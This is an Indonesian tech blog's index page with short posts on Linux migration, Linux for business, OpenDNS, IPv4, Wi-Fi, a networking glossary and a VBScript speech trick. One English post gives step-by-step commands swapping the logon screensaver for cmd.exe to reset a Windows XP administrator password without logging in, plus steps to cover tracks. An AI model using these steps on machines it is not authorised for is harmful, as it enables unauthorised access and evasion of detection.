     Banyak perusahaan atau individu belum melakukan migrasi dari Windows ke Linux di karenakan takut tidak terbiasa dengan lingkungan Linux. Oleh karena itu, Resolvo System merilis versi gratis dari MoveOver, sebuah tool migrasi desktop yang di maksudkan untuk membantu para pengguna Windows agar tidak kesusahan dalam melakukan migrasi ke Linux hanya dengan beberapa klik mouse.
     Dengan versi gratis MoveOver, pengguna dapat memindahkan file, wallpaper, cookies, dan favorite Internet.
MoveOver ini akan menyertakan interface yang user friendly, dan menggunakan wizard yang membantu proses migrasi dari berbagai lingkungan Windows, termasuk dokumen, pesan-pesan e-mail dan pengaturan dari Outlook Express, wallpaper, cookies, bookmark Internasional, dan preferensi pengguna yang spesifik lainnya ke desktop distro Linux yang populer.
     Proses Instalasinya juga cepat dan tidak membutuhkan pengetahuan Linux, demikian kata perusahaan Resolvo System.
     Versi komersialnya, yaitu MoveOver Standard Edition seharga US$20 untuk pengguna rumahan dan perkantoran kecil. Sedangkan MoveOver Enterprise ditujukan bagi fasilitas dengan jumlah 20-100.000 komputer. Aplikasi-aplikasi tool migrasi dapat di peroleh di situs resmi Resolvo System.
     Jadi bagaimana? apa anda tertarik?
READ MORE - Tool Migrasi Windows Ke Linux Tersedia Gratis

Linux Untuk Bisnis

8 comments
        Dalam usianya yang hampir 14 tahun, masih saja ada yang meragukan kemampuan sistem operasi Linux dan FOSS ( free/Open Source Software) atau piranti lunak bebas/open source untuk bisnis. Kami sering menerima pertanyaan pembaca yang akan dan sudah terjun di dunia bisnis, misalnya dua kasus berikut ini. Pertama, jika saya ingin bisnis berbasis teknologi informasi, bolehkah FOSS seperti Linux dikomersialkian? Kedua, daparkah saya menggunakan FOSS untuk membuat program yang akan saya jadikan tertutup hanya untuk bisnis saya?
        Kasus pertama memiliki banyak contoh. Kata kuncinya , free software bukan freeware, artinya bukan piranti lunak gratis, Free adalah freedom yang berarti bebas atau merdeka. Anda tidak dilarang menjual piranti lunak bebas selama anda tidak melanggar kesepakatan yang tertulis dalam lisensinya. Model lisensi piranti lunak bebas dan open source cukup banyak , ada lebih dari 40 macam.
       Contoh bisinis ini adalah perusahaan Red Hat, yang menjual Red Hat Enterprise Linux dengan harga cukup mahal. Perusahaan pembuat distro Linux lain seperti Mandrake dan SUSE (yang sekarang saya pakai) juga menjual paket distro versi komersial , misalnya Madrake PowerPack dan SUSE Linux Enterprise Server. Contoh lainnya adalah Xandros.
       Pada prinsipnya , perusahaan-perusahaan itu tidak hanya menjual piranti lunak atau CD, tapi juga melengkapinya dengan manual atau buku dan terutama dukungan teknis, termasuk update. Anda dapat mencontoh keberhasilan mereka dengan menjual produk serupa, misalnya distro CentOS (versi download, turunan Red Hat Enterprise Linux) yang anda lengkapi dengan manual dan dukungan teknis yang baik. Anda juga dapat menjual Debian (distro dasar untuk membuat Xandros) yang anda paketkan bersama Wine atau CrossOver Office agar dapat menjalankan program-program Windows.
      Kasus kedua juga cukup banyak contohnya. JBoss dan Apache Tomcat merupakan contoh program open source yang dapat digunakan untuk membangun aplikasi bisnis. Beberapa perusahaan di Indonesia telah menggunakan keduanya untuk membangun aplikasi ERP (Enterprise Resource Planning).
     Hampir semua program open source dapat anda gunakan untuk membuat program komersial, misalnya dengan bahasa pemrograman C, Python, PHP, Java, dan lain-lain, tanpa harus membayar royalti pada pembuatnya. Hanya saja, pengembang FOSS menunggu dukungan anda, dalam bentuk apapun agar FOSS semakin sesuai kebutuhan Anda.
READ MORE - Linux Untuk Bisnis

Pengertian OpenDNS

13 comments
OpenDNS adalah sebuah layanan resolusi Domain Name System (DNS) gratis yang tersedia untuk publik.

Layanan OpenDNS

OpenDNS menawarkan resolusi DNS untuk para konsumen dan bisnis sebagai alternatif dari penggunaan server DNS yang ditawarkan oleh ISP yang mereka gunakan. Dengan menyimpan server perusahaan di lokasi-lokasi strategis dan menggunakan tembolok nama-nama domain yang sangat besar, OpenDNS seringnya memproses query jauh lebih cepat, sehingga meningkatkan kecepatan pengambilan halaman. Hasil query DNS bahkan kadang dimasukkan ke dalam tembolok oleh sistem operasi lokal atau aplikasi, sehingga kecepatan ini mungkin tidak terlihat oleh pengguna untuk setiap permintaan, tapi hanya untuk permintaan yang tidak disimpan di dalam tembolok lokal.
Fitur lainnya yang ditawarkan adalah filter phishing, pemblokiran domain dan koreksi kesalahan pengetikan (sebagai contoh, mengetikkan "wikipedia.og", bukan "wikipedia.org"). Dengan mengumpulkan sekumpulan daftar situs-situs mencurigakan, OpenDNS akan memblokir akses ke situs-situs tersebut saat seorang pengguna mencoba untuk mengaksesnya melalui layanan yang ditawarkan oleh OpenDNS. OpenDNS juga menawarkan PhishTank, di mana para pengguna dari seantero dunia dapat mengirimkan dan me-review situs-situs yang dicurigai merupakan situs phishing.


Sebuah screenshot dari sebuah halaman yang terblokir akibat 'phishing blocked'
.
OpenDNS sendiri bukanlah sebuah perangkat lunak open source, tapi merujuk kepada konsep DNS yang bersifat terbuka, di mana query dari sumber manapun akan diterima.
OpenDNS mendapatkan sebagian dari pendapatannya dengan cara melakukan resolusi terhadap sebuah nama domain ke sebuah server OpenDNS saat namanya belum didefinisikan di dalam DNS. Hal ini akan memiliki pengaruh saat seorang pengguna mengetikkan sebuah nama yang tidak ada di dalam URL dalam sebuah kotak isian alamat di penjelajah Web, dan pengguna akan melihat halaman pencarian OpenDNS. Para pengiklan akan membayar OpenDNS untuk menampilkan iklan mereka di dalam halaman pencarian ini. Memang hal ini mirip seperti apa yang dilakukan oleh VeriSign Site Finder, tapi OpenDNS mengatakan bahwa hal tersebut tidaklah sama, karena memang OpenDNS adalah sebuah layanan pilihan (bandingkan dengan Site Finder yang memiliki pengaruh terhadap keseluruhan Internet, mengingat VeriSign merupakan sebuah operator registri otoritatif), dan para peengiklan akan membayar layanan DNS yang telah dikustomisasi.

READ MORE - Pengertian OpenDNS

Alamat IP versi 4

2 comments
Alamat IP versi 4 (sering disebut dengan Alamat IPv4) adalah sebuah jenis pengalamatan jaringan yang digunakan di dalam protokol jaringan TCP/IP yang menggunakan protokol IP versi 4. Panjang totalnya adalah 32-bit, dan secara teoritis dapat mengalamati hingga 4 miliar host komputer atau lebih tepatnya 4.294.967.296 host di seluruh dunia, jumlah host tersebut didapatkan dari 256 (didapatkan dari 8 bit) dipangkat 4(karena terdapat 4 oktet) sehingga nilai maksimal dari alamt IP versi 4 tersebut adalah 255.255.255.255 dimana nilai dihitung dari nol sehingga nilai nilai host yang dapat ditampung adalah 256x256x256x256=4.294.967.296 host. sehingga bila host yang ada diseluruh dunia melebihi kuota tersebut maka dibuatlah IP versi 6 atau IPv6.
READ MORE - Alamat IP versi 4

Blogger Buzz: Blogger integrates with Amazon Associates

0 comments
READ MORE - Blogger Buzz: Blogger integrates with Amazon Associates

Pengertian Wireless Lan

4 comments
      Wi-Fi merupakan kependekan dari "Wireless Fidelity", memiliki pengertian yaitu sekumpulan standar yang digunakan untuk Jaringan Lokal Nirkabel (Wireless Local Area Networks - WLAN) yang didasari ada spesifikasi IEEE 802.11. Standar terbaru dari spesifikasi  802.11a  atau  b,  seperti  802.16 g, saat  ini sedang  dalam  penyusunan, spesifikasi terbaru tersebut menawarkan banyak peningkatan mulai dari luas cakupan yang lebih jauh hingga kecepatan transfernya.

      Wi-Fi (Wireless Fidelity) adalah koneksi tanpa kabel seperti handphone dengan mempergunakan teknologi radio sehingga pemakainya dapat mentransfer data dengan cepat dan aman. Wi-Fi tidak hanya dapat digunakan untuk mengakses internet, Wi-Fi juga dapat digunakan untuk membuat jaringan tanpa kabel di perusahaan. Karena itu banyak orang mengasosiasikan Wi-Fi dengan “Kebebasan” karena teknologi Wi-Fi memberikan kebebasan kepada pemakainya untuk mengakses internet atau mentransfer data dari ruang meeting, kamar hotel, kampus, dan café-café yang bertanda “Wi-Fi Hot Spot”. Juga salah satu kelebihan dari Wi-Fi adalah kecepatannya yang beberapa kali lebih cepat dari modem kabel yang tercepat. Jadi pemakai Wi-Fi tidak lagi harus berada di dalam ruang kantor untuk bekerja.

      Ada beragam standar 802.11 yang ditetapkan oleh IEEE. Untuk koneksi Wi-Fi antar perangkat, ada tiga jenis jaringan nirkabel yang ditetapkan oleh IEEE. Mereka adalah  standar  802.11a,  802.11b,  dan 802.11g.  Yang membedakan  masing-masing standar adalah jangkauan frekuensi dan kecepatan transfernya. Kebanyakan perangkat yang dijual saat ini dilengkapi standar 802.11b, meskipun kecepatan transfer datanya lebih lambat daripada kecepatan standar 802.11a. Pasalnya, kebanykan instalasi Wi-Fi saat ini dibangun menggunakan standar 802.11b.
READ MORE - Pengertian Wireless Lan

Pengertian Lan Dan Internet

2 comments

Jaringan : jaringan (network) adalah kumpulan dua atau lebih sistem komputer yang terhubung. Terdapat banyak jenis jaringan komputer:

1.local-area network (LAN): komputer yang terhubung berada pada tempat yang berdekatan secara gografis (misalkan satu gedung).
2.wide-area network (WAN): komputer yang terhubung berada pada tempat yang berjauhan dan dihubungkan dengan line telepon atau gelombang radio. selain itu, jaringan komputer dapat juga dikelompokan berdasar kriteria di bawah ini:
•topologi: pengaturan keterhubungan antar sistem komputer. Terdapat bermacam-macam topologi seperti bus, star, dan ring.

•protokol: protokol mendefinisikan sekelompok aturan dan sinyal yang digunakan oleh komputer pada jaringan untuk berkomunikasi. Protokol LAN yang paling populer adalah Ethernet. Protokol LAN lain yang banyak digunakan adalah IBM token-ring network.
•arsitektur: jaringan dapat diklasifikasikan ke dalam arsitektur peer-to-peer atau client/server.

NIC : NIC (network interface card) adalah expansion board yang digunakan supaya komputer dapat dihubungkan dengan jaringan. Sebagian besar NIC dirancang untuk jaringan, protokol, dan media tertentu. NIC biasa disebut dengan LAN card (Local Area Network Card).

Backbone : Backbone adalah saluran atau koneksi berkecepatan tinggi yang menjadi lintasan utama dalam sebuah jaringan.

Bandwidth : Bandwidth menunjukan kapasitas dalam membawa informasi. Istilah ini dapat digunakan dalam banyak hal: Telepon, jaringan kabel, bus, sinyal frekuensi radio, dan monitor. Paling tepat, bandwidth diukur dengan putaran perdetik (cycles per second), atau hertz (Hz), yaitu perbedaan antara frekuensi terendah dan tertinggi yang dapat ditransmisikan. Tetapi juga sering digunakan ukuran bit per second (bps).

Bridge : Bridge adalah peranti yang meneruskan lalu lintas antara segmen jaringan berdasar informasi pada lapisan data link. Segmen ini mempunyai alamat lapisan jaringan yang sama. Setiap jaringan seharusnya hanya mempunyai sebuah bridge utama.

DNS : DNS (domain name sistem) adalah sistem yang menerjemahkan domain Internet, seperti www.microsoft.com menjadi alamat Internet, yaitu serangkaian nomor yang terlihat seperti 101.232.12.5. Istilah DNS berhubungan dengan konvensi untuk penamaan host pada Internet dan cara penangan nama-nama tersebut.

Ethernet : Ethernet adalah protokol LAN yang dikembangkan oleh Xerox Corporation yang bekerjasama dengan DEC dan Intel pada tahun 1976. Ethernet menggunakan topologi bus atau star dan medukung transfer data sampai dengan 10 Mbps. Versi Ethernet yang lebih baru yang disebut 100Base-T (atau Fast Ethernet), mendukung transfer data sampai dengan 100 Mbps,
dan versi terbarunya, Gigabit Ethernet, mendukung tranfer data sampai dengan 1 Gigabit per detik atau 1000 Mbps.

Fast Ethernet : Fast Ethernet seperti Ethernet biasa, namun dengan kecepatan transfer data yang lebih cepat, sampai dengan 100 mbps. Ethernet ini juga disebut 100BaseT.

Gateway : Istilah gateway merujuk kepada hardware atau software yang menjembatani dua aplikasi atau jaringan yang tidak kompatibel, sehingga data dapat ditransfer antar komputer yang berbeda-beda. Salah satu contoh penggunaan gateway adalah pada email, sehingga pertukaran email dapat dilakukan pada sistem yang berbeda.

GPS : GPS (Global Positioning System ) adalah sistem navigasi menggunakan 24 satelit MEO (medium earth orbit atau middle earth orbit) yang mengelilingi bumi dan penerima-penerima di bumi. Satelit mengorbit pada ketinggian sekitar 12.000 mil di atas bumi dan mampu mengelilingi bumi dua kali dalam 24 jam. Satelit GPS secara kontinu mengirimkan sinyal radio digital yang mengandung data lokasi satelit dan waktu pada penerima yang berhubungan. Satelit GPS dilengkapi dengan jam atom dengan ketepatan satu per satu juta detik.

Berdasar informasi ini, stasiun penerima mengetahui berapa lama waktu yang digunakan untuk mengirim sinyal sampai ke penerima di bumi. Semakin lama waktu yang digunakan untuk sampai ke penerima, semakin jauh posisi satelit dari stasiun penerima. dengan mengetahui posisi satelit, penerima mengetahui bahwa satelit terletak pada posisi tertentu pada permukaan bola imaginer yang berpusat pada satelit.

Dengan menggunakan tiga satelit, GPS dapat menghitung lintang dan bujur penerima berdasar perpotongan ketiga bola imaginer. Dengan menggunakan empat satelit, dapat juga ditentukan ketinggian. GPS dikembangkan dan dioperasikan oleh Departemen Pertahanan Amerika. GPS, asalnya dikenal dengan NAVSTAR (Navigation System with Timing and Ranging). Sebelum untuk keperluan yang lebih luas, GPS digunakan untuk menyediakan kemampuan navigasi sepanjang waktu dan dalam segala cuaca untuk militer darat, laut, dan angkatan udara. Disamping untuk navigasi dan penentuan posisi geografik, GPS dapat juga digunakan di antaranya untuk pemetaan, kehutanan, eksplorasi mineral, manajemen habitat liar, dan pengawasan perpindahan penduduk.

Host : Host adalah sistem komputer yang diakses oleh pengguna yang bekerja pada lokasi yang jauh. Biasanya, istilah ini digunakan jika ada dua sistem komputer yang terhubung dengan modem dan saluran telepon. Sistem mengandung data yang disebut host, sedang sitem yang digunakan untuk mengases dari jarak jauh disebut remote terminal. Istilah host juga digunakan untuk menyebut komputer yang terhubung dengan jaringan TCP/IP, termasuk Internet. Setiap host mempunyai alamat IP yang unik. Selain itu, istilah host juga merujuk pada penyediaan infrastruktur layanan komputer. Sebagai contoh, banyak perusahaan yang menjadi host Web server, yang berarti bahwa perusahaan tersebut menyediakan hardware, software, dan saluran komunikasi yang dibutuhkan oleh server, tetapi isi server (data) dikendalikan oleh pihak lain.

ISP (Internet Service Provider) : ISP (Internet service provider) adalah penyedia layanan Internet. Sebagian besar ISP mempunyai jaringan server (mail, berita, Web), router, modem yang dihubungkan dengan koneksi “backbone” Internet yang permanen dan berkecepatan tinggi. Pelanggan ISP dapat mendapatkan koneksi Internet dengan modem dan telepon. Untuk mengakses Internet pelanggan ISP harus melakukan dial ke jaringan dengan menekan nomor telepon tertentu milik ISP.

Internet : Internet adalah jaringan global yang menghubungkan jutaan komputer. Sejak 1999 Internet telah memiliki 200 juta pemakai di seluruh dunia, dan jumlah ini meningkat cepat. Lebih dari 100 negara terhubung dengan Internet untuk menukar data, berita, dan informasi lainnya. Setiap komputer yang terhubung dengan Internet disebut host.

ISDN : ISDN (Integrated Services Digital Network) adalah standard komunikasi internasional untuk pengiriman suara, video dan data melalui line telepon digital atau telepon kawat biasa. ISDN mempunyai kecepatan transfer data 64 Kbps. Sebagian besar saluran ISDN ditawarkan oleh perusahaan telepon yang memungkinkan dua saluran, yang disebut kanal B (B channel). Satu line dapat digunakan untuk suara dan yang lain untuk data lain dan keduanya mempunyai kecepatan transfer 128 Kbps. Versi awal ISDN menggunakan transmisi baseband. Versi lain ISDN, yaitu B-ISDN, menggunakan transmisi broadband dan dapat mendukung transmisi data dengan kecepatan 1,5 Mbps.

Protocol (protokol) : Bahasa atau prosedur hubungan yang digunakan oleh satu sistem komputer dengan sistem lainnya sehingga antara keduanya dapat saling berhububngan. Untuk dapat berkomunikasi. Kedua system harus menggunakan protokol yang sama.

PPP (Point To Point Protocol) : Protokol TCP/IP yang memungkinkan hubungan antara host dengan jaringan dan antara router dengan router atau dapat pula digunakan untuk hubungan serial antara 2 system.

Repeater : Suatu perangkat yang dipasang di titik-titik tertentu dalam jaringan untuk memperbarui sinyal-sinyal yang di transmisikan agar mencapai kembali kekuatan dan bentuknya yang semula, guna memperpanjang jarak yang dapat di tempuh. Ini di perlukan karena sinyal-sinyal mengalami perlemahan dan perubahan bentuk selama transmisi.

Router : Suatu perangkat yang berfungsi menghubungkan suatu LAN ke suatu internetworking/WAN dan mengelola penyaluran lalu-lintas data di dalamnya.

Routing : Proses dari penentuan sebuah path yang di pakai untuk mengirim data ke tujuan tertentu.

RJ-45 : RJ-45 (Registered Jack-45) adalah konektor delapan kabel yang biasanya digunakan untuk menghubungkan komputer ke sebuah local-area network (LAN), khususnya Ethernets. Konektor RJ-45 mirip dengan konektor RJ-11 yang digunakan dalam koneksi telepon, tetapi lebih besar.

Server : Suatu unit yang berfungsi untuk menyimpan informasi dan untuk mengelola suatu jaringan komputer.komputer server akan melayani seluruh client atau worstation yang terhubung ke jaringannya.

TCP/IP : TCP/IP Transmission Control Protokol adalah dua buah protokol yang dikembangkan oleh militer AS yang memungkinkan komputer pada jaringan dapat saling berhubungan. IP digunakan untuk memindahkan paket data antarsimpul. TCP digunakan untuk memverifikasi pengiriman dari client ke server. TCP/IP adalah dasar internet dan dapat ditemukan pada semua system operasi modern, seperti Unix dan Windows.

Topologi : Dalam jaringan komputer topologi adalah bentuk pengaturan keterhubungan antar sistem komputer. terdapat bermacam-macam topologi seperti bus, star, ring.


READ MORE - Pengertian Lan Dan Internet

KOMPUTER BISA BICARA (ITC)

2 comments
Kadang bermain dengan perintah-perintah dasar sangat mengasikkan, bahkan banyak sekali pekerjaan yg sulit seperti mengembalikan data, mengembalikan partisi yg hilang bahkan sampai pada tingat hack dan crack pun didunia interconectionpun bahasa basic sangat dan harus dilakukan (under teks) kalau dalam dunia linux dikatakan console, yach...mari kita mulai dengan trik klasik yg mungkin mampu menggugah ingatan kita akan nostalgia masa lalu, ayo kita mencoba membuat komputer kita bisa bicara, dengan mempergunakan exstention vbs,walaupun pengucapannya masih dengan terbata-bata kalau kita perintah untuk mengucapkan bahasa INDONESIA :
1.Pertama, buka notepad.
2.Copy-Paste script berikut :

Dim msg, sapi
msg = InputBox ( "Tulis apa yg ingin anda ucapkan?", "Masukan kata-kata")
Set sapi = CreateObject ( "sapi.spvoice")
sapi.Speak msg


3.Save as, kemudian pilih all files lalu kasih nama terserah anda, cntoh : coba.vbs
4.Selesai
Coba sekarang anda klik 2x.
gimana hasilnya.....???????

Atau kalau yang nggak mau menggunakan InputBox (Jadi pas di klik 2x langsung berbicara tanpa perlu memasukan kata-kata). Scriptnya seperti ini :

Dim msg, sapi
msg = "Ganti dengan kata-kata anda"
Set sapi = CreateObject ( "sapi.spvoice")
sapi.Speak msg

 


lalu simpan, dan nikmati hasilnya.......
cukup dulu, InsyaAllah lain kali kita lanjutkan dengan mengupas script-script virus yg banyak beredar dan cara mengatasinya, atau malah mengembangkannya.
sebab segala sesuatu didunia ini adalah untuk manusia, ibarat pisau..ia akan jadi manfaat apabila berada pada tukang sayur, dan akan jadi petaka apabila ditangan perampok. BANYAK JALAN SILAHKAN PILIH. dan semua pasti ada resikonya.
selamat mencoba....?!?!?!
READ MORE - KOMPUTER BISA BICARA (ITC)

How to Hack or Crack a Windows XP Administrator Password

31 comments
Windows XP Privilege Escalation Exploit
(This is provided only for educational purpose//HANYA untuk tujuan pendidikan)

Here are the steps involved to Hack the Window XP Administrator Password .

1. Go to Start –> Run –> Type in CMD
2. You will get a command prompt. Enter these commands the way it is given
3. cd\
4. cd\ windows\system32
5. mkdir temphack
6. copy logon.scr temphack\logon.scr
7. copy cmd.exe temphack\cmd.exe
8. del logon.scr
9. rename cmd.exe logon.scr
10. exit

Wait its not over read the rest to find out how to Hack the Window XP Administrator Password
A Brief explanation of what you are currently doing here is

Your are nagivating to the windows system Directory where the system files are stored. Next your creating a temporary directory called mkdir. After which you are copying or backing up the logon.scr and cmd.exe files into the mkdir then you are deleting the logon.scr file and renaming cmd.exe file to logon.scr.

So basically you are telling windows is to backup the command program and the screen saver file. Then we edited the settings so when windows loads the screen saver, we will get an unprotected dos prompt without logging in. When this appears enter this command

net user password

Example: If the admin user name is clazh and you want change the password to pass Then type in the following command

net user clazh pass

This will chang the admin password to pass.
Thats it you have sucessfully hacked the Window XP Administrator Password now you can Log in, using the hacked Window XP Administrator Password and do whatever you want to do.

Here are the steps involved to De Hack or restore the Window XP Administrator Password to cover your tracks.

1. Go to Start –> Run –> Type in CMD
2. You will get a command prompt. Enter these commands the way it is given
3. cd\
4. cd\ windows\system32\temphack
5. copy logon.scr C:\windows\system32\logon.scr
6. copy cmd.exe C:\windows\system32\cmd.exe
7. exit

Or simply go to C:\windows\system32\temphack and copy the contents of temphack back into system32 directory click Yes to overwrite the modified files.

Note To administrators: You can block the entire password change thing just a little tweak in the local security policy (control panel->administrative tools,works only for administrators group) will disallow any change in password even if u r the Admin (u can put a number of other restrictions too), but be cautious to give other users limitted accounts. After you have done this, the above Screensaver technique will fail.

Update: The above Method only works if the system is FAT/FAT32 – because of the updated “user rights management” in NTFS – file level rights etc. This does not work on a system using NTFS.


Source : http://linuxinuse.blogspot.com
READ MORE - How to Hack or Crack a Windows XP Administrator Password

OpenOffice.org

2 comments
The OpenOffice.org office suite offers a complete set of office tools,including word processing,spreadsheet,presentation,vector drawing,and database components.Because OpenOffice.org is available for a number of operating systems,you can use the same data across different computing
platforms.To start OpenOffice.org,click Computer →OpenOffice.org Writer .To create a new document,click File →New ,then choose the type of document you want to create.To open an existing document,click Open ,then select the file you want from the file system.
READ MORE - OpenOffice.org

Using the GNOME Control Center

0 comments
In addition to letting you change individual desktop elements,GNOME lets you extensively personalize your desktop.You can find more settings to adjust the overall appearance and behavior of your desktop in the GNOME Control Center.There,you can also change fonts,keyboard and mouse configurations,regional and language settings,parameters for your Internet and network usage,and more.To start the Control Center, click Computer ,then click Control Center on the right of the main menu.

READ MORE - Using the GNOME Control Center
Prev Prev Prev